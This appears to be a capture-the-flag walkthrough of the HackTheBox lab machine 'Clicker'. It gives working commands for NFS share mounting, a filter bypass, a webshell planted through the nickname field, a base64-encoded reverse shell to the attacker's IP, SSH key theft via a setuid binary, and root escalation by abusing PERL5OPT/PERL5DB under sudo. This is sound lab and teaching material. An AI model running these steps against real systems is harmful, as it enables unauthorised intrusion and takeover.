🖱️

Clicker

 
22,80,111,2049,39319,41095,46873,48073,60887
notion image
10.129.62.93 clicker.htb
notion image
http://clicker.htb/login.php http://clicker.htb/play.php http://clicker.htb/info.php http://clicker.htb/export.php rhttp://clicker.htb/register.php
register an account ivan:123456
PHPSESSID=2cgonbun427jaletnuemcdl8a1
 
because i see nfs services open in nmap port scan, let’s see if there is any possible mounting folder.
showmount -e 10.129.62.93
notion image
mount -t nfs 10.129.62.93:/mnt/backups /mnt -o nolock
i get a zip file called clicker.htb_backup.zip , copy and unzip it in a new folder
notion image
it seems the source code of the web application clicker.
notion image
credentials for sql database.
localhost clicker_db_user:clicker_db_password DB= clicker
 
Let’s see the close and save function on web apps
notion image
notion image
‘role’ is being filtered as malicious words
notion image
Let’s see how to bypass the filter
header injection
notion image
try it out
notion image
redirection
notion image
logout and then login back
notion image
here comes a new functionality called administration
notion image
notion image
we can see the export path in this new functionality
notion image
notion image
modification in extension is controlled by export.php
notion image
try to access export path: exports/top_players_bz6cuda5.php
notion image
the uploaded file is accessible
notion image
in authenticate.php, parameter ‘nickname’ seems injectable with webshell.
play the game again, add parameter nickname as webshell
notion image
notion image
export it in administration
notion image
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=whoami
notion image
webshell is accessible
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=cat%20/etc/passwd%20|%20grep%20-v%20nologin
notion image
we can see some user name of the server
echo "sh -i >& /dev/tcp/10.10.14.12/6666 0>&1" | base64 c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx
create reverse shell ,encoded by base64 and URL encode
echo%20%22c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx%22%20%7C%20base64%20-d%20%7C%20bash
notion image
get the reverseshell
after enumeration, we get into /opt folder
notion image
notion image
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
download and open it by ghidra
notion image
in main funciton(),we can see inside the switch cases “default”
param_2 stands for the second arguemnt, let’s have a try in the file.
notion image
it seems all number for param_1 besides (0-4) can be ran as execute files. and param_2 specifies the filename arguments. it is reading file content.
by the way, this program seems have privilege to access file that included in the same folder with some .sql file which is not accessible by our current user privilege.
Then after enumeration
./execute_query 6 ../.ssh/id_rsa
we can get the private key for user jack’s authentication
notion image
Because the openssh format is not correct from what we copy directly, add two ‘-’ to correct the format.
notion image
get the access of user jack
jack@clicker:~$ sudo -l Matching Defaults entries for jack on clicker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User jack may run the following commands on clicker: (ALL : ALL) ALL (root) SETENV: NOPASSWD: /opt/monitor.sh
jack@clicker:~$ cat /opt/monitor.sh #!/bin/bash if [ "$EUID" -ne 0 ] then echo "Error, please run as root" exit fi set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin unset PERL5LIB; unset PERLLIB; data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token); /usr/bin/xml_pp <<< $data; if [[ $NOSAVE == "true" ]]; then exit; else timestamp=$(/usr/bin/date +%s) /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml fi
notion image
/usr/bin/xml_pp
googling
notion image
notion image
notion image
we find a exploit called perl_startup
notion image
here shows the detail of payload
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "/bin/bash"' exim -ps 2>&-})
let’s back to the target
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh bash -p
notion image
get the root